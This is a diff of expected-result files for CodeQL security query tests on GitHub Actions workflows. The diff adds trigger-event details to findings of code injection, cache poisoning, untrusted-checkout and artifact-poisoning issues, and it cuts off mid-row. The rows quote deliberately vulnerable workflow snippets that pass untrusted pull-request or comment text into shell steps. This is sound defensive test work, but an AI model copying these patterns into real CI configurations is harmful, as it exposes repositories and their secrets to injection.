.github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index 5c5c26edb4e..9cfac091f67 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -7,4 +7,4 @@ nodes | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index cc5ce9bdf87..6b1a3e87313 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -44,10 +44,10 @@ edges | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | #select -| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 418aeeea059..da66ff822a3 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -97,13 +97,13 @@ edges | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | #select -| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected index 3a001efbbe8..4f7149b6980 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected @@ -1,2 +1,2 @@ -| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index fd3c1fbc195..aa0057d60a1 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -52,20 +52,20 @@ nodes | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select -| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | python foo/x.py | -| .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | sh cmd | -| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | -| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | -| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | -| .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho 